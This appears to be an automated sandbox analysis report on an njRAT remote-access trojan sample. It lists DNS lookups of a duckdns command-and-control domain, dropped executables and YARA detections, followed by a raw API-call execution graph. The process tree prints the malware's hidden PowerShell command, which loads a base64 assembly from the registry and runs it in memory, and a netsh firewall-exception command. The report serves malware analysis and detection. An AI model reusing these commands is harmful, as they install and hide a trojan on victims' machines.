        Jul 1, 2024 10:25:00.094950914 CEST8.8.8.8192.168.2.220x1dcbNo error (0)water-boom.duckdns.org192.169.69.25A (IP address)IN (0x0001)false
        Jul 1, 2024 10:25:13.878819942 CEST8.8.8.8192.168.2.220x9764No error (0)water-boom.duckdns.org192.169.69.25A (IP address)IN (0x0001)false
        Jul 1, 2024 10:25:27.474947929 CEST8.8.8.8192.168.2.220x6436No error (0)water-boom.duckdns.org192.169.69.25A (IP address)IN (0x0001)false
        Jul 1, 2024 10:25:27.481844902 CEST8.8.8.8192.168.2.220x6436No error (0)water-boom.duckdns.org192.169.69.25A (IP address)IN (0x0001)false

        Click to jump to process

        Click to jump to process

        Click to dive into process behavior distribution

        Click to jump to process

        Target ID:0
        Start time:04:21:25
        Start date:01/07/2024
        Path:C:\Users\user\Desktop\._cache_1.exe
        Wow64 process (32bit):true
        Commandline:"C:\Users\user\Desktop\._cache_1.exe"
        Imagebase:0x400000
        File size:1'178'304 bytes
        MD5 hash:62C01F1B2AC0A7BAB6C3B50FD51E6A36
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:low
        Has exited:false

        Target ID:1
        Start time:04:21:26
        Start date:01/07/2024
        Path:C:\Users\user\AppData\Local\Temp\Tr.exe
        Wow64 process (32bit):true
        Commandline:"C:\Users\user\AppData\Local\Temp\Tr.exe"
        Imagebase:0xac0000
        File size:915'456 bytes
        MD5 hash:4D3B21451ED0EE3EE65888D4C8944693
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Antivirus matches:
        • Detection: 100%, Joe Sandbox ML
        • Detection: 81%, ReversingLabs
        • Detection: 67%, Virustotal, Browse
        Reputation:low
        Has exited:true

        Target ID:2
        Start time:04:21:37
        Start date:01/07/2024
        Path:C:\Windows\System32\cmd.exe
        Wow64 process (32bit):false
        Commandline:"C:\Windows\System32\cmd.exe" /c start /min powershell -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [System.Reflection.Assembly]::Load([System.Convert]::FromBase64String((Get-ItemProperty HKCU:\Software).Valuex)).EntryPoint.Invoke($Null,$Null)
        Imagebase:0x4a330000
        File size:345'088 bytes
        MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:high
        Has exited:true

        Target ID:4
        Start time:04:21:38
        Start date:01/07/2024
        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Wow64 process (32bit):false
        Commandline:powershell -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [System.Reflection.Assembly]::Load([System.Convert]::FromBase64String((Get-ItemProperty HKCU:\Software).Valuex)).EntryPoint.Invoke($Null,$Null)
        Imagebase:0x13faf0000
        File size:443'392 bytes
        MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Yara matches:
        • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000004.00000002.872864488.000000000296C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
        • Rule: Windows_Trojan_Njrat_30f3c220, Description: unknown, Source: 00000004.00000002.872864488.000000000296C000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
        • Rule: RAT_njRat, Description: Detects njRAT, Source: 00000004.00000002.872864488.000000000296C000.00000004.00000800.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
        • Rule: njrat1, Description: Identify njRat, Source: 00000004.00000002.872864488.000000000296C000.00000004.00000800.00020000.00000000.sdmp, Author: Brian Wallace @botnet_hunter
        Reputation:moderate
        Has exited:false

        Target ID:6
        Start time:04:21:42
        Start date:01/07/2024
        Path:C:\Windows\System32\netsh.exe
        Wow64 process (32bit):false
        Commandline:netsh firewall add allowedprogram "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "powershell.exe" ENABLE
        Imagebase:0xf70000
        File size:87'040 bytes
        MD5 hash:637982A421D0133DCEAA0D1490D1DC9C
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:moderate
        Has exited:true

        Target ID:7
        Start time:04:21:46
        Start date:01/07/2024
        Path:C:\Windows\System32\cmd.exe
        Wow64 process (32bit):false
        Commandline:"C:\Windows\System32\cmd.exe" /c start /min powershell -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [System.Reflection.Assembly]::Load([System.Convert]::FromBase64String((Get-ItemProperty HKCU:\Software).Valuex)).EntryPoint.Invoke($Null,$Null)
        Imagebase:0x4a190000
        File size:345'088 bytes
        MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:high
        Has exited:true

        Target ID:9
        Start time:04:21:46
        Start date:01/07/2024
        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Wow64 process (32bit):false
        Commandline:powershell -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [System.Reflection.Assembly]::Load([System.Convert]::FromBase64String((Get-ItemProperty HKCU:\Software).Valuex)).EntryPoint.Invoke($Null,$Null)
        Imagebase:0x13faf0000
        File size:443'392 bytes
        MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Yara matches:
        • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000009.00000002.395438531.0000000002D1A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
        • Rule: Windows_Trojan_Njrat_30f3c220, Description: unknown, Source: 00000009.00000002.395438531.0000000002D1A000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
        • Rule: RAT_njRat, Description: Detects njRAT, Source: 00000009.00000002.395438531.0000000002D1A000.00000004.00000800.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
        • Rule: njrat1, Description: Identify njRat, Source: 00000009.00000002.395438531.0000000002D1A000.00000004.00000800.00020000.00000000.sdmp, Author: Brian Wallace @botnet_hunter
        Reputation:moderate
        Has exited:true

        Target ID:11
        Start time:04:21:54
        Start date:01/07/2024
        Path:C:\Users\user\AppData\Local\Temp\x.exe
        Wow64 process (32bit):true
        Commandline:"C:\Users\user\AppData\Local\Temp\x.exe"
        Imagebase:0x400000
        File size:1'178'304 bytes
        MD5 hash:62C01F1B2AC0A7BAB6C3B50FD51E6A36
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Antivirus matches:
        • Detection: 100%, Avira
        • Detection: 100%, Joe Sandbox ML
        • Detection: 81%, ReversingLabs
        • Detection: 69%, Virustotal, Browse
        Reputation:low
        Has exited:false

        Target ID:12
        Start time:04:21:55
        Start date:01/07/2024
        Path:C:\Users\user\AppData\Local\Temp\Tr.exe
        Wow64 process (32bit):true
        Commandline:"C:\Users\user\AppData\Local\Temp\Tr.exe"
        Imagebase:0x3a0000
        File size:915'456 bytes
        MD5 hash:4D3B21451ED0EE3EE65888D4C8944693
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:low
        Has exited:true

        Reset < >

          Execution Graph

          Execution Coverage:3.2%
          Dynamic/Decrypted Code Coverage:0%
          Signature Coverage:9.8%
          Total number of Nodes:2000
          Total number of Limit Nodes:26
          execution_graph 81442 4010e0 81445 401100 81442->81445 81444 4010f8 81446 401113 81445->81446 81447 401182 81446->81447 81448 401120 81446->81448 81449 401184 81446->81449 81450 40114c 81446->81450 81451 40112c DefWindowProcW 81447->81451 81448->81451 81504 401000 Shell_NotifyIconW setSBCS 81448->81504 81483 401250 81449->81483 81452 401151 81450->81452 81453 40119d 81450->81453 81451->81444 81455 401219 81452->81455 81456 40115d 81452->81456 81458 4011a3 81453->81458 81459 42afb4 81453->81459 81455->81448 81462 401225 81455->81462 81460 401163 81456->81460 81461 42b01d 81456->81461 81457 401193 81457->81444 81458->81448 81465 4011b6 KillTimer 81458->81465 81466 4011db SetTimer RegisterWindowMessageW 81458->81466 81499 40f190 10 API calls 81459->81499 81467 42afe9 81460->81467 81468 40116c 81460->81468 81461->81451 81503 4370f4 52 API calls 81461->81503 81506 468b0e 74 API calls setSBCS 81462->81506 81498 401000 Shell_NotifyIconW setSBCS 81465->81498 81466->81457 81472 401204 CreatePopupMenu 81466->81472 81501 40f190 10 API calls 81467->81501 81468->81448 81474 401174 81468->81474 81469 42b04f 81505 40e0c0 74 API calls setSBCS 81469->81505 81472->81444 81500 45fd57 65 API calls setSBCS 81474->81500 81477 42afe4 81477->81457 81478 42b00e 81502 401a50 391 API calls 81478->81502 81479 4011c9 PostQuitMessage 81479->81444 81482 42afdc 81482->81451 81482->81477 81484 401262 setSBCS 81483->81484 81485 4012e8 81483->81485 81507 401b80 81484->81507 81485->81457 81487 40128c 81488 4012d1 KillTimer SetTimer 81487->81488 81489 4012bb 81487->81489 81490 4272ec 81487->81490 81488->81485 81493 4012c5 81489->81493 81494 42733f 81489->81494 81491 4272f4 Shell_NotifyIconW 81490->81491 81492 42731a Shell_NotifyIconW 81490->81492 81491->81488 81492->81488 81493->81488 81497 427393 Shell_NotifyIconW 81493->81497 81495 427348 Shell_NotifyIconW 81494->81495 81496 42736e Shell_NotifyIconW 81494->81496 81495->81488 81496->81488 81497->81488 81498->81479 81499->81457 81500->81482 81501->81478 81502->81447 81503->81447 81504->81469 81505->81447 81506->81477 81508 401b9c 81507->81508 81528 401c7e 81507->81528 81529 4013c0 52 API calls 81508->81529 81510 401bac 81511 42722b LoadStringW 81510->81511 81512 401bb9 81510->81512 81514 427246 81511->81514 81530 402160 81512->81530 81552 40e0a0 52 API calls 81514->81552 81515 401bcd 81517 427258 81515->81517 81518 401bda 81515->81518 81520 40d200 52 API calls 81517->81520 81518->81514 81519 401be4 81518->81519 81543 40d200 81519->81543 81522 427267 81520->81522 81523 42727b 81522->81523 81525 401bf3 setSBCS _wcscpy _wcsncpy 81522->81525 81524 40d200 52 API calls 81523->81524 81526 427289 81524->81526 81527 401c62 Shell_NotifyIconW 81525->81527 81527->81528 81528->81487 81529->81510 81531 426daa 81530->81531 81532 40216b _wcslen 81530->81532 81566 40c600 81531->81566 81535 402180 81532->81535 81536 40219e 81532->81536 81534 426db5 81534->81515 81553 403bd0 52 API calls ctype 81535->81553 81554 4013a0 52 API calls 81536->81554 81539 402187 _memmove 81539->81515 81540 4021a5 81541 426db7 81540->81541 81555 4115d7 81540->81555 81544 40d210 81543->81544 81545 4269d1 81543->81545 81602 40d1a0 81544->81602 81612 4013a0 52 API calls 81545->81612 81548 40d219 81548->81525 81549 4269d8 _wcslen 81550 4115d7 52 API calls 81549->81550 81551 426a07 _memmove 81550->81551 81552->81525 81553->81539 81554->81540 81557 4115e1 _malloc 81555->81557 81558 4115fb 81557->81558 81561 4115fd std::exception::exception 81557->81561 81571 4135bb 81557->81571 81558->81539 81559 41163b 81586 4180af 46 API calls std::exception::operator= 81559->81586 81561->81559 81585 41130a 51 API calls __cinit 81561->81585 81562 411645 81587 418105 RaiseException 81562->81587 81565 411656 81567 40c619 81566->81567 81568 40c60a 81566->81568 81567->81534 81568->81567 81594 4026f0 81568->81594 81570 426d7a _memmove 81570->81534 81572 413638 _malloc 81571->81572 81577 4135c9 _malloc 81571->81577 81593 417f77 46 API calls __getptd_noexit 81572->81593 81575 4135f7 RtlAllocateHeap 81575->81577 81584 413630 81575->81584 81577->81575 81578 413624 81577->81578 81581 4135d4 81577->81581 81582 413622 81577->81582 81591 417f77 46 API calls __getptd_noexit 81578->81591 81581->81577 81588 418901 46 API calls __NMSG_WRITE 81581->81588 81589 418752 46 API calls 7 library calls 81581->81589 81590 411682 GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 81581->81590 81592 417f77 46 API calls __getptd_noexit 81582->81592 81584->81557 81585->81559 81586->81562 81587->81565 81588->81581 81589->81581 81591->81582 81592->81584 81593->81584 81595 426873 81594->81595 81596 4026ff 81594->81596 81601 4013a0 52 API calls 81595->81601 81596->81570 81598 42687b 81599 4115d7 52 API calls 81598->81599 81600 42689e _memmove 81599->81600 81600->81570 81601->81598 81603 40d1ae _wcslen 81602->81603 81604 426983 81603->81604 81605 40d1bf 81603->81605 81619 4013a0 52 API calls 81604->81619 81613 402f00 81605->81613 81608 40d1c9 _memmove 81608->81548 81609 42698a 81610 4115d7 52 API calls 81609->81610 81611 4269b0 _memmove 81610->81611 81612->81549 81614 402f10 81613->81614 81615 402f0c 81613->81615 81616 4115d7 52 API calls 81614->81616 81617 4268c3 81614->81617 81615->81608 81618 402f51 ctype _memmove 81616->81618 81618->81608 81619->81609 81620 40d370 81621 4115d7 52 API calls 81620->81621 81622 40d385 81621->81622 81623 4115d7 52 API calls 81622->81623 81624 40d391 81623->81624 81625 42b1d2 81634 40bc10 81625->81634 81627 42b1e0 81645 4720db 81627->81645 81629 42b228 81732 45e737 90 API calls 3 library calls 81629->81732 81631 42bb6a 81733 44b92d VariantClear 81631->81733 81633 42bc5b 81635 40bc24 81634->81635 81636 40bc17 81634->81636 81638 40bc2a 81635->81638 81639 40bc3c 81635->81639 81734 408e80 VariantClear 81636->81734 81735 408e80 VariantClear 81638->81735 81641 4115d7 52 API calls 81639->81641 81644 40bc43 81641->81644 81642 40bc1f 81642->81627 81643 40bc33 81643->81627 81644->81627 81646 472108 setSBCS 81645->81646 81647 4721d1 81646->81647 81648 47215e 81646->81648 81650 47226d 81647->81650 81651 472545 SHGetFolderPathW 81647->81651 81652 472324 81647->81652 81653 4724a1 81647->81653 81654 4723ae 81647->81654 81655 4725ad SHGetFolderPathW 81647->81655 81656 47252b SHGetFolderPathW 81647->81656 81657 472369 81647->81657 81658 4724f7 SHGetFolderPathW 81647->81658 81659 472255 81647->81659 81660 472274 81647->81660 81661 4723f3 81647->81661 81662 472593 SHGetFolderPathW 81647->81662 81663 472511 SHGetFolderPathW 81647->81663 81664 4722df 81647->81664 81665 47255f SHGetFolderPathW 81647->81665 81666 47229e GetLocalTime 81647->81666 81667 47247d 81647->81667 81668 4724dd SHGetFolderPathW 81647->81668 81669 472579 SHGetFolderPathW 81647->81669 81670 472438 81647->81670 81736 401b10 81648->81736 81650->81629 81674 4722be 81651->81674 81782 441e23 GetSystemTimeAsFileTime 81652->81782 81799 441e23 GetSystemTimeAsFileTime 81653->81799 81788 441e23 GetSystemTimeAsFileTime 81654->81788 81655->81674 81656->81674 81785 441e23 GetSystemTimeAsFileTime 81657->81785 81658->81674 81762 408f40 81659->81762 81766 408e80 VariantClear 81660->81766 81791 441e23 GetSystemTimeAsFileTime 81661->81791 81662->81674 81663->81674 81779 441e23 GetSystemTimeAsFileTime 81664->81779 81665->81674 81676 4722b9 81666->81676 81797 441e23 GetSystemTimeAsFileTime 81667->81797 81668->81674 81669->81674 81794 441e23 GetSystemTimeAsFileTime 81670->81794 81768 40e710 81674->81768 81767 41329b 79 API calls 3 library calls 81676->81767 81683 47233c 81783 451aa8 91 API calls _strftime 81683->81783 81684 47240b 81792 451aa8 91 API calls _strftime 81684->81792 81685 472381 81786 451aa8 91 API calls _strftime 81685->81786 81687 472450 81795 451aa8 91 API calls _strftime 81687->81795 81688 47217d 81743 40c2c0 81688->81743 81689 4722f7 81780 451aa8 91 API calls _strftime 81689->81780 81690 4723c6 81789 451aa8 91 API calls _strftime 81690->81789 81691 472489 81798 451b19 83 API calls 81691->81798 81692 4724b3 81800 451aa8 91 API calls _strftime 81692->81800 81705 4724b9 81801 40e6a0 53 API calls 81705->81801 81706 472342 81784 40e6a0 53 API calls 81706->81784 81707 472411 81793 40e6a0 53 API calls 81707->81793 81708 47228b 81708->81629 81709 472387 81787 40e6a0 53 API calls 81709->81787 81710 472456 81796 40e6a0 53 API calls 81710->81796 81712 4722cc 81712->81629 81713 4722fd 81781 40e6a0 53 API calls 81713->81781 81714 4723cc 81790 40e6a0 53 API calls 81714->81790 81722 4724c2 81722->81629 81723 47234b 81723->81629 81724 47241a 81724->81629 81725 472390 81725->81629 81726 47245f 81726->81629 81728 472306 81728->81629 81729 4723d5 81729->81629 81730 4721b6 81730->81629 81731 472193 81731->81629 81732->81631 81733->81633 81734->81642 81735->81643 81737 401b16 _wcslen 81736->81737 81738 401b63 81737->81738 81739 4115d7 52 API calls 81737->81739 81742 40bd50 52 API calls 81738->81742 81740 401b4b _memmove 81739->81740 81741 4115d7 52 API calls 81740->81741 81741->81738 81742->81688 81744 40c2c7 81743->81744 81745 40c30e 81743->81745 81746 40c2d3 81744->81746 81747 426c79 81744->81747 81748 40c315 81745->81748 81749 426c2b 81745->81749 81802 403ea0 52 API calls __cinit 81746->81802 81807 4534e3 52 API calls 81747->81807 81753 40c321 81748->81753 81754 426c5a 81748->81754 81751 426c4b 81749->81751 81752 426c2e 81749->81752 81805 4534e3 52 API calls 81751->81805 81760 40c2de 81752->81760 81804 4534e3 52 API calls 81752->81804 81803 403ea0 52 API calls __cinit 81753->81803 81806 4534e3 52 API calls 81754->81806 81760->81731 81761 408e80 VariantClear 81760->81761 81761->81730 81763 408f48 ctype 81762->81763 81764 4265c7 VariantClear 81763->81764 81765 408f55 ctype 81763->81765 81764->81765 81765->81650 81766->81708 81767->81674 81769 408f40 VariantClear 81768->81769 81770 40e71b 81769->81770 81771 4115d7 52 API calls 81770->81771 81772 40e729 81771->81772 81773 40e734 81772->81773 81774 426bdc 81772->81774 81775 426be7 81773->81775 81776 401b10 52 API calls 81773->81776 81774->81775 81808 40bc70 81774->81808 81778 40e743 81776->81778 81778->81712 81779->81689 81780->81713 81781->81728 81782->81683 81783->81706 81784->81723 81785->81685 81786->81709 81787->81725 81788->81690 81789->81714 81790->81729 81791->81684 81792->81707 81793->81724 81794->81687 81795->81710 81796->81726 81797->81691 81798->81676 81799->81692 81800->81705 81801->81722 81802->81760 81803->81760 81804->81760 81805->81754 81806->81760 81807->81760 81809 4115d7 52 API calls 81808->81809 81810 40bc98 81809->81810 81811 4115d7 52 API calls 81810->81811 81812 40bca6 81811->81812 81812->81775 81813 425ba2 81818 40e360 81813->81818 81815 425bb4 81834 41130a 51 API calls __cinit 81815->81834 81817 425bbe 81819 4115d7 52 API calls 81818->81819 81820 40e3ec GetModuleFileNameW 81819->81820 81835 413a0e 81820->81835 81822 40e421 _wcsncat 81838 413a9e 81822->81838 81825 4115d7 52 API calls 81826 40e45e _wcscpy 81825->81826 81827 40bc70 52 API calls 81826->81827 81828 40e498 81827->81828 81841 40e4c0 81828->81841 81830 40e4a9 81830->81815 81831 401c90 52 API calls 81833 40e4a1 _wcscat _wcslen _wcsncpy 81831->81833 81832 4115d7 52 API calls 81832->81833 81833->81830 81833->81831 81833->81832 81834->81817 81855 413801 81835->81855 81885 419efd 81838->81885 81897 403350 81841->81897 81843 40e4cb RegOpenKeyExW 81844 427190 RegQueryValueExW 81843->81844 81845 40e4eb 81843->81845 81846 4271b0 81844->81846 81847 42721a RegCloseKey 81844->81847 81845->81833 81848 4115d7 52 API calls 81846->81848 81847->81833 81849 4271cb 81848->81849 81904 43652f 52 API calls 81849->81904 81851 4271d8 RegQueryValueExW 81852 42720e 81851->81852 81853 4271f7 81851->81853 81852->81847 81854 402160 52 API calls 81853->81854 81854->81852 81856 41389e 81855->81856 81862 41381a 81855->81862 81857 4139e8 81856->81857 81858 413a00 81856->81858 81882 417f77 46 API calls __getptd_noexit 81857->81882 81884 417f77 46 API calls __getptd_noexit 81858->81884 81861 4139ed 81883 417f25 10 API calls __read_nolock 81861->81883 81862->81856 81868 41388a 81862->81868 81877 419e30 46 API calls __read_nolock 81862->81877 81865 41396c 81865->81856 81866 413967 81865->81866 81869 41397a 81865->81869 81866->81822 81867 413929 81867->81856 81870 413945 81867->81870 81879 419e30 46 API calls __read_nolock 81867->81879 81868->81856 81876 413909 81868->81876 81878 419e30 46 API calls __read_nolock 81868->81878 81881 419e30 46 API calls __read_nolock 81869->81881 81870->81856 81870->81866 81872 41395b 81870->81872 81880 419e30 46 API calls __read_nolock 81872->81880 81876->81865 81876->81867 81877->81868 81878->81876 81879->81870 81880->81866 81881->81866 81882->81861 81883->81866 81884->81866 81886 419f13 81885->81886 81887 419f0e 81885->81887 81894 417f77 46 API calls __getptd_noexit 81886->81894 81887->81886 81890 419f2b 81887->81890 81892 40e454 81890->81892 81896 417f77 46 API calls __getptd_noexit 81890->81896 81892->81825 81893 419f18 81895 417f25 10 API calls __read_nolock 81893->81895 81894->81893 81895->81892 81896->81893 81898 403367 81897->81898 81899 403358 81897->81899 81900 4115d7 52 API calls 81898->81900 81899->81843 81901 403370 81900->81901 81902 4115d7 52 API calls 81901->81902 81903 40339e 81902->81903 81903->81843 81904->81851 81905 41f250 SetUnhandledExceptionFilter 81906 472663 SHGetFolderPathW 81907 416454 81944 416c70 81907->81944 81909 416460 GetStartupInfoW 81910 416474 81909->81910 81945 419d5a HeapCreate 81910->81945 81912 4164cd 81913 4164d8 81912->81913 82029 41642b 46 API calls 3 library calls 81912->82029 81946 417c20 GetModuleHandleW 81913->81946 81916 4164de 81917 4164e9 __RTC_Initialize 81916->81917 82030 41642b 46 API calls 3 library calls 81916->82030 81965 41aaa1 GetStartupInfoW 81917->81965 81921 416503 GetCommandLineW 81978 41f584 GetEnvironmentStringsW 81921->81978 81925 416513 81984 41f4d6 GetModuleFileNameW 81925->81984 81927 41651d 81928 416528 81927->81928 82032 411924 46 API calls 3 library calls 81927->82032 81988 41f2a4 81928->81988 81931 41652e 81932 416539 81931->81932 82033 411924 46 API calls 3 library calls 81931->82033 82002 411703 81932->82002 81935 416541 81937 41654c __wwincmdln 81935->81937 82034 411924 46 API calls 3 library calls 81935->82034 82006 40d6b0 81937->82006 81940 41657c 82036 411906 46 API calls _doexit 81940->82036 81943 416581 __tzset_nolock 81944->81909 81945->81912 81947 417c34 81946->81947 81948 417c3d GetProcAddress GetProcAddress GetProcAddress GetProcAddress 81946->81948 82037 4178ff 49 API calls _free 81947->82037 81950 417c87 TlsAlloc 81948->81950 81953 417cd5 TlsSetValue 81950->81953 81954 417d96 81950->81954 81951 417c39 81951->81916 81953->81954 81955 417ce6 __init_pointers 81953->81955 81954->81916 82038 418151 InitializeCriticalSectionAndSpinCount 81955->82038 81957 417d91 82046 4178ff 49 API calls _free 81957->82046 81959 417d2a 81959->81957 82039 416b49 81959->82039 81962 417d76 82045 41793c 46 API calls 4 library calls 81962->82045 81964 417d7e GetCurrentThreadId 81964->81954 81966 416b49 __calloc_crt 46 API calls 81965->81966 81977 41aabf 81966->81977 81967 41ac6a GetStdHandle 81972 41ac34 81967->81972 81968 416b49 __calloc_crt 46 API calls 81968->81977 81969 41acce SetHandleCount 81976 4164f7 81969->81976 81970 41ac7c GetFileType 81970->81972 81971 41abb4 81971->81972 81973 41abe0 GetFileType 81971->81973 81974 41abeb InitializeCriticalSectionAndSpinCount 81971->81974 81972->81967 81972->81969 81972->81970 81975 41aca2 InitializeCriticalSectionAndSpinCount 81972->81975 81973->81971 81973->81974 81974->81971 81974->81976 81975->81972 81975->81976 81976->81921 82031 411924 46 API calls 3 library calls 81976->82031 81977->81968 81977->81971 81977->81972 81977->81976 81977->81977 81979 41f595 81978->81979 81980 41f599 81978->81980 81979->81925 82056 416b04 81980->82056 81982 41f5bb _memmove 81983 41f5c2 FreeEnvironmentStringsW 81982->81983 81983->81925 81985 41f50b _wparse_cmdline 81984->81985 81986 416b04 __malloc_crt 46 API calls 81985->81986 81987 41f54e _wparse_cmdline 81985->81987 81986->81987 81987->81927 81989 41f2bc _wcslen 81988->81989 81993 41f2b4 81988->81993 81990 416b49 __calloc_crt 46 API calls 81989->81990 81995 41f2e0 _wcslen 81990->81995 81991 41f336 82063 413748 81991->82063 81993->81931 81994 416b49 __calloc_crt 46 API calls 81994->81995 81995->81991 81995->81993 81995->81994 81996 41f35c 81995->81996 81999 41f373 81995->81999 82062 41ef12 46 API calls __read_nolock 81995->82062 81998 413748 _free 46 API calls 81996->81998 81998->81993 82069 417ed3 81999->82069 82001 41f37f 82001->81931 82003 411711 __initterm_e __initp_misc_cfltcvt_tab __IsNonwritableInCurrentImage 82002->82003 82005 411750 __IsNonwritableInCurrentImage 82003->82005 82088 41130a 51 API calls __cinit 82003->82088 82005->81935 82007 42e2f3 82006->82007 82008 40d6cc 82006->82008 82009 408f40 VariantClear 82008->82009 82010 40d707 82009->82010 82089 40ebb0 82010->82089 82015 40d737 82095 411951 82015->82095 82018 40d751 82107 40f4e0 KiUserCallbackDispatcher SystemParametersInfoW 82018->82107 82020 40d75f 82108 40d590 GetCurrentDirectoryW 82020->82108 82022 40d767 SystemParametersInfoW 82023 40d794 82022->82023 82024 40d78d FreeLibrary 82022->82024 82025 408f40 VariantClear 82023->82025 82024->82023 82026 40d79d 82025->82026 82027 408f40 VariantClear 82026->82027 82028 40d7a6 82027->82028 82028->81940 82035 4118da 46 API calls _doexit 82028->82035 82029->81913 82030->81917 82035->81940 82036->81943 82037->81951 82038->81959 82041 416b52 82039->82041 82042 416b8f 82041->82042 82043 416b70 Sleep 82041->82043 82047 41f677 82041->82047 82042->81957 82042->81962 82044 416b85 82043->82044 82044->82041 82044->82042 82045->81964 82046->81954 82048 41f683 82047->82048 82051 41f69e _malloc 82047->82051 82049 41f68f 82048->82049 82048->82051 82055 417f77 46 API calls __getptd_noexit 82049->82055 82050 41f6b1 HeapAlloc 82050->82051 82053 41f6d8 82050->82053 82051->82050 82051->82053 82053->82041 82054 41f694 82054->82041 82055->82054 82059 416b0d 82056->82059 82057 4135bb _malloc 45 API calls 82057->82059 82058 416b43 82058->81982 82059->82057 82059->82058 82060 416b24 Sleep 82059->82060 82061 416b39 82060->82061 82061->82058 82061->82059 82062->81995 82064 413753 HeapFree 82063->82064 82068 41377c _free 82063->82068 82065 413768 82064->82065 82064->82068 82072 417f77 46 API calls __getptd_noexit 82065->82072 82067 41376e GetLastError 82067->82068 82068->81993 82073 417daa 82069->82073 82072->82067 82074 417dc9 setSBCS __call_reportfault 82073->82074 82075 417de7 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 82074->82075 82076 417eb5 __call_reportfault 82075->82076 82079 41a208 82076->82079 82078 417ed1 GetCurrentProcess TerminateProcess 82078->82001 82080 41a210 82079->82080 82081 41a212 IsDebuggerPresent 82079->82081 82080->82078 82087 41fe19 82081->82087 82084 421fd3 SetUnhandledExceptionFilter UnhandledExceptionFilter 82085 421ff8 GetCurrentProcess TerminateProcess 82084->82085 82086 421ff0 __call_reportfault 82084->82086 82085->82078 82086->82085 82087->82084 82088->82005 82147 40ebd0 82089->82147 82092 40ec00 82093 40ebb0 2 API calls 82092->82093 82094 40ec05 82093->82094 82094->82015 82151 4182cb 82095->82151 82097 41195e 82158 4181f2 LeaveCriticalSection 82097->82158 82099 40d748 82100 4119b0 82099->82100 82101 4119d6 82100->82101 82102 4119bc 82100->82102 82101->82018 82102->82101 82193 417f77 46 API calls __getptd_noexit 82102->82193 82104 4119c6 82194 417f25 10 API calls __read_nolock 82104->82194 82106 4119d1 82106->82018 82107->82020 82195 401f20 82108->82195 82110 40d5b6 IsDebuggerPresent 82111 40d5c4 82110->82111 82112 42e1bb MessageBoxA 82110->82112 82113 42e1d4 82111->82113 82114 40d5e3 82111->82114 82112->82113 82368 403a50 52 API calls 3 library calls 82113->82368 82265 40f520 82114->82265 82118 40d5fd GetFullPathNameW 82277 401460 82118->82277 82120 40d63b 82121 42e231 SetCurrentDirectoryW 82120->82121 82123 40d643 82120->82123 82121->82123 82122 40d64c 82292 410390 GetSysColorBrush LoadCursorW LoadIconW LoadIconW LoadIconW 82122->82292 82123->82122 82369 432fee 6 API calls 82123->82369 82127 42e252 82127->82122 82129 42e25a GetModuleFileNameW 82127->82129 82131 42e274 82129->82131 82132 42e2cb GetForegroundWindow ShellExecuteW 82129->82132 82130 40d656 82134 40d669 82130->82134 82366 40e0c0 74 API calls setSBCS 82130->82366 82133 401b10 52 API calls 82131->82133 82135 40d688 82132->82135 82136 42e281 82133->82136 82300 4091e0 82134->82300 82141 40d692 SetCurrentDirectoryW 82135->82141 82139 40d200 52 API calls 82136->82139 82142 42e28d 82139->82142 82141->82022 82143 40d200 52 API calls 82142->82143 82145 42e299 GetForegroundWindow ShellExecuteW 82143->82145 82146 42e2c6 82145->82146 82146->82135 82148 40d72e 82147->82148 82149 40ebd6 LoadLibraryA 82147->82149 82148->82015 82148->82092 82149->82148 82150 40ebe7 GetProcAddress 82149->82150 82150->82148 82152 4182e0 82151->82152 82153 4182f3 EnterCriticalSection 82151->82153 82159 418209 82152->82159 82153->82097 82155 4182e6 82155->82153 82186 411924 46 API calls 3 library calls 82155->82186 82158->82099 82160 418215 __tzset_nolock 82159->82160 82161 418225 82160->82161 82162 41823d 82160->82162 82187 418901 46 API calls __NMSG_WRITE 82161->82187 82165 416b04 __malloc_crt 45 API calls 82162->82165 82176 41824b __tzset_nolock 82162->82176 82164 41822a 82188 418752 46 API calls 7 library calls 82164->82188 82167 418256 82165->82167 82169 41825d 82167->82169 82170 41826c 82167->82170 82168 418231 82189 411682 GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 82168->82189 82190 417f77 46 API calls __getptd_noexit 82169->82190 82173 4182cb __lock 45 API calls 82170->82173 82174 418273 82173->82174 82177 4182a6 82174->82177 82178 41827b InitializeCriticalSectionAndSpinCount 82174->82178 82176->82155 82181 413748 _free 45 API calls 82177->82181 82179 418297 82178->82179 82180 41828b 82178->82180 82192 4182c2 LeaveCriticalSection _doexit 82179->82192 82182 413748 _free 45 API calls 82180->82182 82181->82179 82183 418291 82182->82183 82191 417f77 46 API calls __getptd_noexit 82183->82191 82187->82164 82188->82168 82190->82176 82191->82179 82192->82176 